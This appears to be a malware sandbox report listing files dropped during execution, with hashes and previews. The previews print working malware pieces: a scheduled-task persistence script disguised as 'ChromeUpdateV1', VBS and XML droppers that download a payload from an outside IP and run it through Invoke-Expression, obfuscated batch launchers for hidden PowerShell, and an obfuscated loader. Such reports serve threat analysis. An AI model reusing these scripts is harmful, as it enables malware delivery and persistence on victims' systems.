                                          SSDEEP:3:l8mllllUetYejgmwllJ9Aqpw3mZill3YpllAllwQXulZMPCyH:RXNzjcJiP3joRAWQA
                                          MD5:36EFC517829C87C54FE90FC0E45D063E
                                          SHA1:CB60139984904632871EC4FA36F040A2FC541B02
                                          SHA-256:9C3035C8F17DA18828FD42C942D2745E629DD4C5FC16259ADB903A4D4142D0FE
                                          SHA-512:EE840D35EB60E58C7917ADF355F0B2AD4B3EC8C3683BCD77580F5DD9ABCC1971ED890ECE64682E787148CF9DEBF323888F2B35374DACABB8E274D4800EA71A83
                                          Malicious:false
                                          Preview:<S.......................................;...{..1"...|...%...|...........%...|o..%...|...M...%...|..................d.=..%...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                          Category:dropped
                                          Size (bytes):97157
                                          Entropy (8bit):7.996245860465221
                                          Encrypted:true
                                          SSDEEP:1536:WvLxlkAiGJQSAapWyjbp/CfvcSZ6MiEdazBBzX+RxnekeQC2mg+7qUTSe8oOnJhQ:m5RuSl/tCfvX6MTda3zXgxnekeQ9mjWU
                                          MD5:2E650D8ACA0CE25F097EC0393F5635EA
                                          SHA1:048ECA71EF4C5034F6B445C23A59724579D89A13
                                          SHA-256:D8E58AD8AAEFAEB36168A5DF9BDBD812E0D614ECA924DD1DAD25C38C9D975241
                                          SHA-512:30B5F1D1C9F5D4E8E111F9AE5A8C1FC13DBC9F5583C6136D1B656406F5516F5513C3E26DE202DB61C85CD66A1B29141F3AC08F91D974D1E5F9D72BFF7DA7AFE0
                                          Malicious:false
                                          Preview:PK.........qfXi.D.....U.......TextCZvTbYMEYspgaPVo.vbs..;o.@.....?....!.H)...c...8........0.>.X)0M...o..Rb2.0...5..z..{Y.|.....e...rR/..co.g.;....&5l......`..v.F.=.B.q.....8.1.@<$...A,.M~ .+....l...PU..........7t...\.}.:.s.l...0..|IWs'..*...1{...*$,...........:..J1".M].4.h.\.......S&U.Ft..p.xoI]yv.hI,...C..T.![.^..]....2...j..PK........`qfXP.+[f...........DnWEdFPemZvdtKRs.ps1]Q.n.0../........}.w0.u..6..4...q..R@.........B.q...?.. ......ohXLK....-...h.H...l>.......V...Q.....b...m...5h....l.;.J.c.......q=.e...0..|rjc!.b......*V...{T..(...RD.'..5...$Y"(..f..2..}..(..,dk..WQ....}.......t..j]...]W.ec....M\R.] qT6n..o.q.a?.xhb./....K.X_.......~cM...... q..<n.D.F._....y.NL.....W....*.....>.:..w.]E:W.o......M~.PK.........qfX..?.....X.......NewRdpFirstTry.vbs.R.o.0..7..h8....KvX..........C;....._.*f..e.~...#.E.{Bp.7 ...5|+.-...Q..K".u...?...{..Kh"R....U+....lNm...../..h$X.....B)..G=q......*5.?.J.r..4..4z...p._/.>Y.No"Z.fZ_...3{2.i.l:63..x1..@{.5.........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):539
                                          Entropy (8bit):5.267485980858452
                                          Encrypted:false
                                          SSDEEP:12:JMCEimooM5BpWYpShOF47BGBKyzOVrERURXf5N:JMCEroDbWqM+47Y0siERURXn
                                          MD5:79A5AFE9C89440CBD58345092932B500
                                          SHA1:0C19CE90D3190D9F1239772CE5DC78BEB2150742
                                          SHA-256:41EDEA87438533FDC222EBB65E318D72E0C81B077904583C678772DAA49F8396
                                          SHA-512:1932020312CD7451571900EEDD70DA3DEA5FBB42E8E9F3EED5AEF184B4B366A5A29763A299406655174A038828916C1455800331AC1EBDEA7BD7C59820DF539E
                                          Malicious:true
                                          Preview:..$gy = New-Object -ComObject Schedule.Service..$gy.Connect()..$td = $gy.NewTask(0)..$td.RegistrationInfo.Description = "Runs a script every 2 minutes"..$td.Settings.Enabled = $true..$td.Settings.DisallowStartIfOnBatteries = $false..$st = $td.Triggers.Create(1)..$st.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")..$st.Repetition.Interval = "PT2M"..$yk = $td.Actions.Create(0)..$yk.Path = "C:\Users\Public\NewRdpFirstTry.vbs"..$ns = $gy.GetFolder("\")..$ns.RegisterTaskDefinition("ChromeUpdateV1", $td, 6, $null, $null, 3)
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:ASCII text, with very long lines (419), with no line terminators
                                          Category:dropped
                                          Size (bytes):419
                                          Entropy (8bit):5.370441018124353
                                          Encrypted:false
                                          SSDEEP:6:V44GAHtSlRAyqbvLZjVIaHY3H94aHY3lIWQuoaHb/WSaHtv3QaHY3lIzbACHkt:vGA0LRELRVSNCCprvKCgCHkt
                                          MD5:2AEAA5E8ADDDEB8F95DE2B7593F4FBC4
                                          SHA1:40215438840423FC80EB2A76D48E839325E37450
                                          SHA-256:3B2EB8B2EC16AEF984E704528FE0800B24A46B75BE15B76F3B4908175D8517E0
                                          SHA-512:D9EA078A5898E7D7E834D9BFDE8D0C3FA3F91D218798DFA7AE348947155B1CC9F93900C15D7DE4AE690D3168DDF856947BBE1D912567A087D82968C371FDA5C5
                                          Malicious:true
                                          Preview:<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr.zip" -DestinationPath "C:\Users\Public\" -Force; Start "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"; Remove-Item -Path "C:\Users\Public\sNGobbjhXGKsSanr.zip" -Force</execute> </a></command>
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):600
                                          Entropy (8bit):5.5072797492944545
                                          Encrypted:false
                                          SSDEEP:12:9vWd+BUhc0l/3s/zOhbohD4j+94jkUSD/nhT4jKG3k/CezMmR/migIHybxETmuoO:9A+j0l/sLXR4jm4jkUOV4j103g0/5gIX
                                          MD5:7417E9A0529ACDC4025222B406DE0168
                                          SHA1:7E297D2872E8EAD3DE3AF8941ED5FF35E57D5D90
                                          SHA-256:5529CE28BAC56A21F4935413D03E6C0C2B77AE255F5F4866D39A4C85112F0623
                                          SHA-512:473D3377B037A178A43E6EDE28C1AC8D18B4DA23A9666D11DDBCBB28051633E4BC250BE7560D9C2FCD46D2565E9ED5AA483E52F74D0A72F223BCEE6C1FD5B91C
                                          Malicious:false
                                          Preview:On Error Resume Next..Dim POcIzDdrENqLTqyM..Dim UvrnJvuQiQrSGZeQ..Dim tMnTSUGklmqaOoOq..UvrnJvuQiQrSGZeQ = False..tMnTSUGklmqaOoOq = 0..Set POcIzDdrENqLTqyM = CreateObject("WScript.Shell")..Dim GtnfewUAwpvQDPJt..GtnfewUAwpvQDPJt = "net session"..tMnTSUGklmqaOoOq = POcIzDdrENqLTqyM.Run(GtnfewUAwpvQDPJt, 0, True)..If tMnTSUGklmqaOoOq = 0 Then..UvrnJvuQiQrSGZeQ = True..End If..Dim IedzXnzCXUJNgIdp..IedzXnzCXUJNgIdp = "C:\Users\Public\solankedoubledigits.bat"..If UvrnJvuQiQrSGZeQ Then..POcIzDdrENqLTqyM.Run IedzXnzCXUJNgIdp, 0..Else..POcIzDdrENqLTqyM.Run IedzXnzCXUJNgIdp, 0..End If..On Error GoTo 0
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):597
                                          Entropy (8bit):5.521420590233325
                                          Encrypted:false
                                          SSDEEP:12:9vWd+lQ1aSFh7V+1Ygfh3SQ1+pGZ8s71m7/DcQ+g+JEXtn:9A+KNFh4ugf9hAlXtn
                                          MD5:470FDA0614F493069AE7266AD5964988
                                          SHA1:0C72577D0CA9B1A04D6F3A455A52AD7C637BF5CE
                                          SHA-256:5FDB91369B61934E3B98B1963D486E81E0BAE91732653AE788F2E3CFCEC32AF2
                                          SHA-512:9AB081081C423BCA9AAE6207CBAF7AFE98B7A14681BA52611C8039F598E70BB6D590FE6D69BFBF6D7E7FF62C11F2BC6D9FEE6CFAC1983D5470D6A0D19D436C00
                                          Malicious:true
                                          Preview:On Error Resume Next..Dim fzQtuuvLreyHTMFi..Dim ypgJLGOqRvUtEMVv..Dim TpOaAoxqizGhneKC..ypgJLGOqRvUtEMVv = False..TpOaAoxqizGhneKC = 0..Set fzQtuuvLreyHTMFi = CreateObject("WScript.Shell")..Dim yXWFdhzWSRMQzvzE..yXWFdhzWSRMQzvzE = "net session"..TpOaAoxqizGhneKC = fzQtuuvLreyHTMFi.Run(yXWFdhzWSRMQzvzE, 0, True)..If TpOaAoxqizGhneKC = 0 Then..ypgJLGOqRvUtEMVv = True..End If..Dim executionCommand..executionCommand = "C:\Users\Public\nKNmegHQBbmlQMTN.bat"..If ypgJLGOqRvUtEMVv Then..fzQtuuvLreyHTMFi.Run executionCommand, 0..Else..fzQtuuvLreyHTMFi.Run executionCommand, 0..End If..On Error GoTo 0
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:DOS batch file, ASCII text, with very long lines (485), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1259
                                          Entropy (8bit):5.78080544816613
                                          Encrypted:false
                                          SSDEEP:24:w7eb0+JMbqx+xIW3yvH9m2jcR8/5t99jJ9QIdUzOoKBWz1ru+b3tSL2MMV8jNL2k:4oCIX/sOoi2JVONCibuiv
                                          MD5:5EE9F48E1ECD11980E83AC7DB8DD16B2
                                          SHA1:552EC8D7B06504A67A7EBDE55F23F556475DB5C1
                                          SHA-256:026079EED694508E0DEAE4F5560AB46B46E9ED79C6EC94F02D13937583A518C0
                                          SHA-512:A0598E6B13036F0AF783668A132AF1B881B377FD54471E3A1B46FB40BCD519FB3B710CC71D60B01EA4022B07EF3E3476823CC00616EF98389179782465A89680
                                          Malicious:true
                                          Preview:@echo off..set "LNpEAwTiHOOLLLrB=po"..set "YafFCSsbOmsVVMcj=wer"..set "ygcfKAKtALtPrOLA=sh"..set "kbMCRcqGTevnpAfZ=el"..set "nprRbzyhXriNhUSO=l."..set "hFFWmbkIUQSJNAoU=e"..set "ZxFcpyvWEjxDtRQR=xe"..set "kbLUiQnqErvDmuNI=-No"..set "poPaKWmgQgxySiXP=Pro"..set "vOPzKBTPyYgZlOCx=fi"..set "OSxFpTYSByGZQBdg=le "..set "AfYibbFoSzpiqLea=-Win"..set "RZLPZdfBMRzvqMlK=dowS"..set "tEEPdvJJpNgSDELD=tyl"..set "VXxBIyHtEnQYzqKO=e Hi"..set "FoAwzhmrfdVTbVcl=dden "..set "IIpOFglltilVGqbC=-Executi"..set "VpkSemHTtacNsHQu=onPolicy By"..set "AqRWaXQArfVpMZuI=pass"..set "wPOTtCZGbYQqNYYs=C:\"..set "rTbcWVEVfoIQEaZc=Users\"..set "PajnFQSKjJKROSNT=Public\"..set "WWoMOruRnohAlDmC=DnWEdFPemZvdtKRs"..set "NftPNaMbrKZOGoQj=.p"..set "IjYwIhwPmGChEPoZ=s"..set "GPUHaCFnFHHzpzFz=1"..%LNpEAwTiHOOLLLrB%%YafFCSsbOmsVVMcj%%ygcfKAKtALtPrOLA%%kbMCRcqGTevnpAfZ%%nprRbzyhXriNhUSO%%hFFWmbkIUQSJNAoU%%ZxFcpyvWEjxDtRQR% %kbLUiQnqErvDmuNI%%poPaKWmgQgxySiXP%%vOPzKBTPyYgZlOCx%%OSxFpTYSByGZQBdg%%AfYibbFoSzpiqLea%%RZLPZdfBMRzvqMlK%
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (64034), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):576457
                                          Entropy (8bit):3.6036865653568295
                                          Encrypted:false
                                          SSDEEP:1536:kDh8DyXBs84VhDEak0EyxWq0Anddy1chWIep:kDhiyXBs84VhDEakbyxWq0Aby1x
                                          MD5:4F74CF98CE587C712925BBE3640C1B47
                                          SHA1:E89E045477B89F0D19D3A316B97B8B0F6EF76DB6
                                          SHA-256:6163A74D83367AED9E85A8B660CF9373A2181161228DCB98457D29FF6975D4D0
                                          SHA-512:ED4B0247A7F8E983A3002D9647E7526DB5E420E73A56839F61944D188DEEE1DF5C1437672CAE25B96458B30931F632FF82D6082DE7C1B89FEB2F3CBD58023221
                                          Malicious:true
                                          Preview:.("{3}{2}{1}{0}"-f'e','aRiabL','t-V','Se') ("{0}{1}"-f'Nyu','B2') ( [TypE]("{1}{0}{2}"-F 'R','CoNVE','t')); try {.. .. function P`ARSer { .. param (${pI`pE}) .("{3}{0}{1}{2}"-f'et-Vari','ab','le','S') -Name ("{0}{1}" -f 'pip','e') -Value (${P`iPE} -split ' ' | &('?') {${_}}) .. foreach(${cHU`Nk} in ${P`IpE} ){ .. ${N`YU`B2}::("{0}{1}{2}"-f 'T','oInt3','2').Invoke(${C`huNK} , 16) .. }
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                          Category:dropped
                                          Size (bytes):97157
                                          Entropy (8bit):7.996245860465221
                                          Encrypted:true
                                          SSDEEP:1536:WvLxlkAiGJQSAapWyjbp/CfvcSZ6MiEdazBBzX+RxnekeQC2mg+7qUTSe8oOnJhQ:m5RuSl/tCfvX6MTda3zXgxnekeQ9mjWU
                                          MD5:2E650D8ACA0CE25F097EC0393F5635EA
                                          SHA1:048ECA71EF4C5034F6B445C23A59724579D89A13
                                          SHA-256:D8E58AD8AAEFAEB36168A5DF9BDBD812E0D614ECA924DD1DAD25C38C9D975241
                                          SHA-512:30B5F1D1C9F5D4E8E111F9AE5A8C1FC13DBC9F5583C6136D1B656406F5516F5513C3E26DE202DB61C85CD66A1B29141F3AC08F91D974D1E5F9D72BFF7DA7AFE0
                                          Malicious:false
                                          Preview:PK.........qfXi.D.....U.......TextCZvTbYMEYspgaPVo.vbs..;o.@.....?....!.H)...c...8........0.>.X)0M...o..Rb2.0...5..z..{Y.|.....e...rR/..co.g.;....&5l......`..v.F.=.B.q.....8.1.@<$...A,.M~ .+....l...PU..........7t...\.}.:.s.l...0..|IWs'..*...1{...*$,...........:..J1".M].4.h.\.......S&U.Ft..p.xoI]yv.hI,...C..T.![.^..]....2...j..PK........`qfXP.+[f...........DnWEdFPemZvdtKRs.ps1]Q.n.0../........}.w0.u..6..4...q..R@.........B.q...?.. ......ohXLK....-...h.H...l>.......V...Q.....b...m...5h....l.;.J.c.......q=.e...0..|rjc!.b......*V...{T..(...RD.'..5...$Y"(..f..2..}..(..,dk..WQ....}.......t..j]...]W.ec....M\R.] qT6n..o.q.a?.xhb./....K.X_.......~cM...... q..<n.D.F._....y.NL.....W....*.....>.:..w.]E:W.o......M~.PK.........qfX..?.....X.......NewRdpFirstTry.vbs.R.o.0..7..h8....KvX..........C;....._.*f..e.~...#.E.{Bp.7 ...5|+.-...Q..K".u...?...{..Kh"R....U+....lNm...../..h$X.....B)..G=q......*5.?.J.r..4..4z...p._/.>Y.No"Z.fZ_...3{2.i.l:63..x1..@{.5.........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:DOS batch file, ASCII text, with very long lines (485), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1252
                                          Entropy (8bit):5.744078494228679
                                          Encrypted:false
                                          SSDEEP:24:w7ajsJYRAE0QW7qR96a9GRmog+F7GPw9L6BhWL9nu01IELkzEfRh0QbI8wJAhpvd:SJYLW+N+JsBbL01nHoQmJA5BnLKfqMq7
                                          MD5:E79645F9F7871C9CD9966F13FE52144D
                                          SHA1:861252AFC962E91E35AEB93AE45739C85EC77A7F
                                          SHA-256:C676A4EF5AE7F4A616BBA72E775CDBDCB5E43A52E3B4632F416EB32E0190FBF8
                                          SHA-512:D360AD3ABCAFC71842FE83F523A75E991BB167CD702381364D62DE73C63701451E732760857C1533EBA4D5460DC030E0C113AD051E06D8B9E604ED5F75AA3E97
                                          Malicious:true
                                          Preview:@echo off..set "UsWfRAADdVaFQEyw=po"..set "QaIaodDZVsFyBElX=wer"..set "QVqQwTpJZJrNJzel=sh"..set "kUgBFvSkUeZZXfiR=el"..set "KAUqnDyyfaIPRgYw=l."..set "jcMtarsoXGggZZbX=e"..set "ltMPkwzQYnxdYHxe=xe"..set "vmQqccWBgODIXlzL=-No"..set "aFEgpxHjZFhuAIGJ=Pro"..set "waqUAEoDTlPFRHTJ=fi"..set "TlJNZtuehUfELOZm=le "..set "wVfhhdSPwrZyaQpy=-Win"..set "OskvyWciLINNObFF=dowS"..set "BzkasbKEsFzzEFKN=tyl"..set "UsqoeJAbumgiOeIH=e Hi"..set "siwACoQXsybYiGOU=dden "..set "licOwlUUGBqnNgtR=-Executi"..set "fpfEeTUhTghHCTEh=onPolicy By"..set "LUTQDClXAeLsDSfE=pass"..set "ffPsTMIVAzjpyNlw=C:\"..set "MRzCBkqADmcAevIE=Users\"..set "ZrIFHLDygptGzkrC=Public\"..set "cURPApZfndOqQOTN=newrdptry"..set "oROZNjdjYlNSWKjT=.p"..set "VqKVeNfuCOqiNzHX=s"..set "deHSkHSZVHAUxlSF=1"..%UsWfRAADdVaFQEyw%%QaIaodDZVsFyBElX%%QVqQwTpJZJrNJzel%%kUgBFvSkUeZZXfiR%%KAUqnDyyfaIPRgYw%%jcMtarsoXGggZZbX%%ltMPkwzQYnxdYHxe% %vmQqccWBgODIXlzL%%aFEgpxHjZFhuAIGJ%%waqUAEoDTlPFRHTJ%%TlJNZtuehUfELOZm%%wVfhhdSPwrZyaQpy%%OskvyWciLINNObFF%%Bzkasb
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):425
                                          Entropy (8bit):5.353683843266035
                                          Encrypted:false
                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:ASCII text, with very long lines (414), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1079
                                          Entropy (8bit):5.670323832701884
                                          Encrypted:false
                                          SSDEEP:24:wV+hEJ6vvVroW3f7gYKYUIMdx0SSIc9dApMn:w+E03yCr5mWPIcXApM
                                          MD5:565EA07FD069AF9D5778A0010C2B18FF
                                          SHA1:0B73FF4F2D03A1D70B8A02CB72F2A28756E05873
                                          SHA-256:F1E45CF3E26A813D9572E46FE6D7A7B4280CD63B15E636205212A029DEB7C88E
                                          SHA-512:FCB4F2C2A883B51264CE7687FFB4E5AB79230F030CE8834AA1D98B04690691BBD5FC456CD96825CCB29B3DF6D621382BEC2B55AD1A15E64A63914D89960E8247
                                          Malicious:false
                                          Preview:Set QPNRUZVYIDDMUFUW = WScript.CreateObject("WScript.Shell")..DSFHCCNROTFURVKP = "<command>" & _.. " <a>" & _.. " <execute>Start-BitsTransfer -Source ""http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg"" -Destination ""C:\Users\Public\sNGobbjhXGKsSanr.zip""; Expand-Archive -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs""; Remove-Item -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -Force</execute>" & _.. " </a>" & _.. "</command>"....Set ILGDKGWKRBCVFRRD = CreateObject("Scripting.FileSystemObject")..Set AXTKEDVJZQRYJAHD = ILGDKGWKRBCVFRRD.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", True)..AXTKEDVJZQRYJAHD.Write DSFHCCNROTFURVKP..AXTKEDVJZQRYJAHD.Close....QPNRUZVYIDDMUFUW.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command"""
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
